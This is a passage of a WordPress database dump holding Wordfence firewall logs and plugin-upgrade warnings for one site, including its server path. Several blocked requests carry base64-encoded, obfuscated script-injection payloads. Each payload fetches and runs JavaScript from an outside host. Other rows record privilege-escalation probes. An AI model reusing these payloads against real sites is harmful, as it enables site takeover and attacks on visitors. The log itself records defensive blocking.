Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"MQ==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37782,1569949720.776491,1569949719.644000,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=test',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"dGVzdA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37783,1569949718.379273,1569949717.124600,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=3',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mw==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37632,1569411215.824979,1569411214.620800,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?Action=EWD_UFAQ_UpdateOptions',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYT1TdHJpbmcuZnJvbUNoYXJDb2RlKDEwNC8qX2FhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYSovLDExMi8qKi8sMTE1LypfYWFhYWFhYWEqLyw1OC8qX2FhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYSovLDQ3LypfYWFhYWFhYWEqLywxMDMvKl9hYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhKi8sOTgvKiovLDEwMS8qX2FhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhKi8sOTgvKl9hYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhKi8sMTAxLyoqLywxMTQvKl9hYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYSovLDk5LypfYWFhYWFhYWEqLywxMTEvKiovLDEwOS8qX2FhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhKi8sMTExLyoqLyw5OS8qX2FhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWEqLyw2Myk7dmFyIF9hYWFhYWFhYSA9IF9hYWFhYWFhYShfYWFhYWFhYWEpO2lmKF9hYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWEoX2FhYWFhYWFhKTt9IGZ1bmN0aW9uIF9hYWFhYWFhYShfYWFhYWFhYWEpeyB2YXIgX2FhYWFhYWFhID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7X2FhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWEsIGZhbHNlICk7X2FhYWFhYWFhLnNlbmQoIG51bGwgKTtyZXR1cm4gX2FhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhKHRvZG8peyB2YXIgX2FhYWFhYWFhID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCB0b2RvKycgcmV0dXJuIHgreTsnKTtfYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37640,1569411224.186712,1569411220.009600,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Live Chat Support <= 8.0.28 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"147\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37791,1569949679.606650,1569949678.379400,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhPVN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LypfYWFhYWFhYSovLDExNi8qX2FhYWFhYWEqLywxMTYvKl9hYWFhYWFhKi8sMTEyLyoqLywxMTUvKl9hYWFhYWFhKi8sNTgvKl9hYWFhYWFhKi8sNDcvKl9hYWFhYWFhKi8sNDcvKl9hYWFhYWFhKi8sMTAzLypfYWFhYWFhYSovLDEwOC8qX2FhYWFhYWEqLyw5Ny8qX2FhYWFhYWEqLywxMTUvKl9hYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWEqLyw5OC8qKi8sMTAxLypfYWFhYWFhYSovLDEwOC8qX2FhYWFhYWEqLyw5Ny8qX2FhYWFhYWEqLywxMTYvKl9hYWFhYWFhKi8sMTAxLypfYWFhYWFhYSovLDExNC8qX2FhYWFhYWEqLyw5OC8qX2FhYWFhYWEqLywxMDEvKl9hYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWEqLywxMTUvKl9hYWFhYWFhKi8sMTE2LypfYWFhYWFhYSovLDEwNC8qX2FhYWFhYWEqLywxMDEvKiovLDExNC8qX2FhYWFhYWEqLywxMDEvKl9hYWFhYWFhKi8sNDYvKl9hYWFhYWFhKi8sOTkvKl9hYWFhYWFhKi8sMTExLyoqLywxMDkvKl9hYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWEqLywxMTEvKiovLDk5LypfYWFhYWFhYSovLDk3LypfYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYSovLDEwOC8qX2FhYWFhYWEqLywxMDEvKl9hYWFhYWFhKi8sOTcvKl9hYWFhYWFhKi8sMTE0LypfYWFhYWFhYSovLDQ2LypfYWFhYWFhYSovLDEwNi8qX2FhYWFhYWEqLywxMTUvKl9hYWFhYWFhKi8sNjMpO3ZhciBfYWFhYWFhYSA9IF9hYWFhYWFhKF9hYWFhYWFhKTtpZihfYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYShfYWFhYWFhYSk7fSBmdW5jdGlvbiBfYWFhYWFhYShfYWFhYWFhYSl7IHZhciBfYWFhYWFhYSA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO19hYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYSwgZmFsc2UgKTtfYWFhYWFhYS5zZW5kKCBudWxsICk7cmV0dXJuIF9hYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWEodG9kbyl7IHZhciBfYWFhYWFhYSA9IG5ldyBGdW5jdGlvbigneCcsICd5JywgdG9kbysnIHJldHVybiB4K3k7Jyk7X2FhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37633,1569411144.776879,1569411132.562300,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWFhPVN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LypfYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhKi8sMTEyLyoqLywxMTUvKl9hYWFhYWFhYWFhKi8sNTgvKl9hYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhKi8sMTAzLypfYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhYWEqLyw5OC8qKi8sMTAxLypfYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWEqLyw5OC8qX2FhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhYWEqLywxMDEvKiovLDExNC8qX2FhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhKi8sOTkvKl9hYWFhYWFhYWFhKi8sMTExLyoqLywxMDkvKl9hYWFhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhYWEqLywxMTEvKiovLDk5LypfYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhKi8sMTE0LypfYWFhYWFhYWFhYSovLDQ2LypfYWFhYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhKi8sNjMpO3ZhciBfYWFhYWFhYWFhYSA9IF9hYWFhYWFhYWFhKF9hYWFhYWFhYWFhKTtpZihfYWFhYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWFhYShfYWFhYWFhYWFhYSk7fSBmdW5jdGlvbiBfYWFhYWFhYWFhYShfYWFhYWFhYWFhYSl7IHZhciBfYWFhYWFhYWFhYSA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO19hYWFhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWFhYSwgZmFsc2UgKTtfYWFhYWFhYWFhYS5zZW5kKCBudWxsICk7cmV0dXJuIF9hYWFhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhYWEodG9kbyl7IHZhciBfYWFhYWFhYWFhYSA9IG5ldyBGdW5jdGlvbigneCcsICd5JywgdG9kbysnIHJldHVybiB4K3k7Jyk7X2FhYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37683,1569411779.817552,1569411778.934500,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(37641,1569411402.496668,1569411399.428700,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php','livechat_settings','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2xpY2Vuc2VFbWFpbF0=\",\"paramValue\":\"Ij48c2NyaXB0ICB0eXBlPXRleHQvamF2YXNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PnZhciBjID0gMDt2YXIgX2FhYWFhYWFhYWFhYWFhYWE9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQvKl9hYWFhYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMTIvKiovLDExNS8qX2FhYWFhYWFhYWFhYWFhYWEqLyw1OC8qX2FhYWFhYWFhYWFhYWFhYWEqLyw0Ny8qX2FhYWFhYWFhYWFhYWFhYWEqLyw0Ny8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMDMvKl9hYWFhYWFhYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMTUvKiovLDQ2LypfYWFhYWFhYWFhYWFhYWFhYSovLDk4LyoqLywxMDEvKl9hYWFhYWFhYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhYWFhKi8sMTE0LypfYWFhYWFhYWFhYWFhYWFhYSovLDk4LypfYWFhYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMTkvKiovLDk3LypfYWFhYWFhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYWFhKi8sMTA0LypfYWFhYWFhYWFhYWFhYWFhYSovLDEwMS8qKi8sMTE0LypfYWFhYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhYWEqLyw0Ni8qX2FhYWFhYWFhYWFhYWFhYWEqLyw5OS8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMTEvKiovLDEwOS8qX2FhYWFhYWFhYWFhYWFhYWEqLyw0Ny8qKi8sMTA4LypfYWFhYWFhYWFhYWFhYWFhYSovLDExMS8qKi8sOTkvKl9hYWFhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYWFhKi8sMTA4LyoqLyw0Ny8qKi8sOTkvKl9hYWFhYWFhYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMTQvKl9hYWFhYWFhYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhYWFhYWFhKi8sMTA2LypfYWFhYWFhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYWFhYWEqLyw2Myk7dmFyIF9hYWFhYWFhYWFhYWFhYWFhID0gX2FhYWFhYWFhYWFhYWFhYWEoX2FhYWFhYWFhYWFhYWFhYWEpO2lmKF9hYWFhYWFhYWFhYWFhYWFhLmxlbmd0aCA+IDMpe19hYWFhYWFhYWFhYWFhYWFhKF9hYWFhYWFhYWFhYWFhYWFhKTt9IGZ1bmN0aW9uIF9hYWFhYWFhYWFhYWFhYWFhKF9hYWFhYWFhYWFhYWFhYWFhKXsgdmFyIF9hYWFhYWFhYWFhYWFhYWFhID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7X2FhYWFhYWFhYWFhYWFhYWEub3BlbiggU3RyaW5nLmZyb21DaGFyQ29kZSg3MSw2OSw4NCksIF9hYWFhYWFhYWFhYWFhYWFhLCBmYWxzZSApO19hYWFhYWFhYWFhYWFhYWFhLnNlbmQoIG51bGwgKTtyZXR1cm4gX2FhYWFhYWFhYWFhYWFhYWEucmVzcG9uc2VUZXh0O31mdW5jdGlvbiBfYWFhYWFhYWFhYWFhYWFhYSh0b2RvKXsgdmFyIF9hYWFhYWFhYWFhYWFhYWFhID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCB0b2RvKycgcmV0dXJuIHgreTsnKTtfYWFhYWFhYWFhYWFhYWFhYSgwLDApO308L3NjcmlwdD4=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":0}');
/*!40000 ALTER TABLE `wpdp_wfhits` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_wfhoover`
--

DROP TABLE IF EXISTS `wpdp_wfhoover`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_wfhoover` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `owner` text,
  `host` text,
  `path` text,
  `hostKey` varbinary(124) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `k2` (`hostKey`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_wfhoover`
--

LOCK TABLES `wpdp_wfhoover` WRITE;
/*!40000 ALTER TABLE `wpdp_wfhoover` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpdp_wfhoover` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_wfissues`
--

DROP TABLE IF EXISTS `wpdp_wfissues`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_wfissues` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `time` int(10) unsigned NOT NULL,
  `lastUpdated` int(10) unsigned NOT NULL,
  `status` varchar(10) NOT NULL,
  `type` varchar(20) NOT NULL,
  `severity` tinyint(3) unsigned NOT NULL,
  `ignoreP` char(32) NOT NULL,
  `ignoreC` char(32) NOT NULL,
  `shortMsg` varchar(255) NOT NULL,
  `longMsg` text,
  `data` text,
  PRIMARY KEY (`id`),
  KEY `lastUpdated` (`lastUpdated`),
  KEY `status` (`status`),
  KEY `ignoreP` (`ignoreP`),
  KEY `ignoreC` (`ignoreC`)
) ENGINE=MyISAM AUTO_INCREMENT=4461 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_wfissues`
--

LOCK TABLES `wpdp_wfissues` WRITE;
/*!40000 ALTER TABLE `wpdp_wfissues` DISABLE KEYS */;
INSERT INTO `wpdp_wfissues` (`id`, `time`, `lastUpdated`, `status`, `type`, `severity`, `ignoreP`, `ignoreC`, `shortMsg`, `longMsg`, `data`) VALUES (4453,1571971176,1571971176,'new','wfPluginUpgrade',50,'3789db46655cba7f2f100a19e716da88','3789db46655cba7f2f100a19e716da88','The Plugin \"Smush\" needs an upgrade (3.2.0.1 -> 3.3.1).','You need to upgrade \"Smush\" to the newest version to ensure you have any security fixes the developer has released.','a:16:{s:4:\"Name\";s:5:\"Smush\";s:9:\"PluginURI\";s:47:\"http://wordpress.org/extend/plugins/wp-smushit/\";s:7:\"Version\";s:7:\"3.2.0.1\";s:11:\"Description\";s:225:\"Reduce image file sizes, improve performance and boost your SEO using the free free <a href=\"https://premium.wpmudev.org/\">WPMU DEV</a> WordPress Smush API. <cite>By <a href=\"https://premium.wpmudev.org/\">WPMU DEV</a>.</cite>\";s:6:\"Author\";s:51:\"<a href=\"https://premium.wpmudev.org/\">WPMU DEV</a>\";s:9:\"AuthorURI\";s:28:\"https://premium.wpmudev.org/\";s:10:\"TextDomain\";s:10:\"wp-smushit\";s:10:\"DomainPath\";s:11:\"/languages/\";s:7:\"Network\";b:0;s:5:\"Title\";s:67:\"<a href=\"http://wordpress.org/extend/plugins/wp-smushit/\">Smush</a>\";s:10:\"AuthorName\";s:8:\"WPMU DEV\";s:10:\"pluginFile\";s:83:\"/home/norfaiz/public_html/bintara.com.my/wp-content/plugins/wp-smushit/wp-smush.php\";s:10:\"newVersion\";s:5:\"3.3.1\";s:4:\"slug\";s:10:\"wp-smushit\";s:5:\"wpURL\";s:40:\"https://wordpress.org/plugins/wp-smushit\";s:10:\"vulnerable\";b:0;}'),(4460,1571971176,1571971176,'new','wfPluginUpgrade',50,'86b8b8291d04e646c731308052042b60','86b8b8291d04e646c731308052042b60','The Plugin \"Yoast SEO\" needs an upgrade (11.0 -> 12.3).','You need to upgrade \"Yoast SEO\" to the newest version to ensure you have any security fixes the developer has released.','a:16:{s:4:\"Name\";s:9:\"Yoast SEO\";s:9:\"PluginURI\";s:18:\"https://yoa.st/1uj\";s:7:\"Version\";s:4:\"11.0\";s:11:\"Description\";s:178:\"The first true all-in-one SEO solution for WordPress, including on-page content analysis, XML sitemaps and much more. <cite>By <a href=\"https://yoa.st/1uk\">Team Yoast</a>.</cite>\";s:6:\"Author\";s:43:\"<a href=\"https://yoa.st/1uk\">Team Yoast</a>\";s:9:\"AuthorURI\";s:18:\"https://yoa.st/1uk\";s:10:\"TextDomain\";s:13:\"wordpress-seo\";s:10:\"DomainPath\";s:11:\"/languages/\";s:7:\"Network\";b:0;s:5:\"Title\";s:42:\"<a href=\"https://yoa.st/1uj\">Yoast SEO</a>\";s:10:\"AuthorName\";s:10:\"Team Yoast\";s:10:\"pluginFile\";s:84:\"/home/norfaiz/public_html/bintara.com.my/wp-content/plugins/wordpress-seo/wp-seo.php\";s:10:\"newVersion\";s:4:\"12.3\";s:4:\"slug\";s:13:\"wordpress-seo\";s:5:\"wpURL\";s:43:\"https://wordpress.org/plugins/wordpress-seo\";s:10:\"vulnerable\";b:0;}'),(4459,1571971176,1571971176,'new','wfPluginUpgrade',50,'b52a7bb7d3409116f04b4f48f6b9cd8f','b52a7bb7d3409116f04b4f48f6b9cd8f','The Plugin \"WP Mail SMTP\" needs an upgrade (1.4.2 -> 1.7.0).','You need to upgrade \"WP Mail SMTP\" to the newest version to ensure you have any security fixes the developer has released.','a:16:{s:4:\"Name\";s:12:\"WP Mail SMTP\";s:9:\"PluginURI\";s:20:\"https://wpforms.com/\";s:7:\"Version\";s:5:\"1.4.2\";s:11:\"Description\";s:238:\"Reconfigures the <code>wp_mail()</code> function to use Gmail/Mailgun/SendGrid/SMTP instead of the default <code>mail()</code> and creates an options page to manage the settings. <cite>By <a href=\"https://wpforms.com/\">WPForms</a>.</cite>\";s:6:\"Author\";s:42:\"<a href=\"https://wpforms.com/\">WPForms</a>\";s:9:\"AuthorURI\";s:20:\"https://wpforms.com/\";s:10:\"TextDomain\";s:12:\"wp-mail-smtp\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:0;s:5:\"Title\";s:47:\"<a href=\"https://wpforms.com/\">WP Mail SMTP</a>\";s:10:\"AuthorName\";s:7:\"WPForms\";s:10:\"pluginFile\";s:89:\"/home/norfaiz/public_html/bintara.com.my/wp-content/plugins/wp-mail-smtp/wp_mail_smtp.php\";s:10:\"newVersion\";s:5:\"1.7.0\";s:4:\"slug\";s:12:\"wp-mail-smtp\";s:5:\"wpURL\";s:42:\"https://wordpress.org/plugins/wp-mail-smtp\";s:10:\"vulnerable\";b:0;}'),(4458,1571971176,1571971176,'new','wfPluginUpgrade',50,'fa6918cdf5dcf0168c09fc08d2dd4c13','fa6918cdf5dcf0168c09fc08d2dd4c13','The Plugin \"WPForms Lite\" needs an upgrade (1.5.2.3 -> 1.5.6).','You need to upgrade \"WPForms Lite\" to the newest version to ensure you have any security fixes the developer has released.','a:16:{s:4:\"Name\";s:12:\"WPForms Lite\";s:9:\"PluginURI\";s:19:\"https://wpforms.com\";s:7:\"Version\";s:7:\"1.5.2.3\";s:11:\"Description\";s:176:\"Beginner friendly WordPress contact form plugin. Use our Drag &amp; Drop form builder to create your WordPress forms. <cite>By <a href=\"https://wpforms.com\">WPForms</a>.</cite>\";s:6:\"Author\";s:41:\"<a href=\"https://wpforms.com\">WPForms</a>\";s:9:\"AuthorURI\";s:19:\"https://wpforms.com\";s:10:\"TextDomain\";s:12:\"wpforms-lite\";s:10:\"DomainPath\";s:9:\"languages\";s:7:\"Network\";b:0;s:5:\"Title\";s:46:\"<a href=\"https://wpforms.com\">WPForms Lite</a>\";s:10:\"AuthorName\";s:7:\"WPForms\";s:10:\"pluginFile\";s:84:\"/home/norfaiz/public_html/bintara.com.my/wp-content/plugins/wpforms-lite/wpforms.php\";s:10:\"newVersion\";s:5:\"1.5.6\";s:4:\"slug\";s:12:\"wpforms-lite\";s:5:\"wpURL\";s:42:\"https://wordpress.org/plugins/wpforms-lite\";s:10:\"vulnerable\";b:0;}'),(4457,1571971176,1571971176,'new','wfPluginUpgrade',100,'bd480b755a9234dd681503105cf08a33','bd480b755a9234dd681503105cf08a33','The Plugin \"WP File Manager\" needs an upgrade (4.6 -> 5.4).','You need to upgrade \"WP File Manager\" to the newest version to ensure you have any security fixes the developer has released.','a:17:{s:4:\"Name\";s:15:\"WP File Manager\";s:9:\"PluginURI\";s:45:\"https://wordpress.org/plugins/wp-file-manager\";s:7:\"Version\";s:3:\"4.6\";s:11:\"Description\";s:109:\"Manage your WP files. <cite>By <a href=\"https://profiles.wordpress.org/mndpsingh287\">mndpsingh287</a>.</cite>\";s:6:\"Author\";s:70:\"<a href=\"https://profiles.wordpress.org/mndpsingh287\">mndpsingh287</a>\";s:9:\"AuthorURI\";s:43:\"https://profiles.wordpress.org/mndpsingh287\";s:10:\"TextDomain\";s:15:\"wp-file-manager\";s:10:\"DomainPath\";s:0:\"\";s:7:\"Network\";b:0;s:5:\"Title\";s:75:\"<a href=\"https://wordpress.org/plugins/wp-file-manager\">WP File 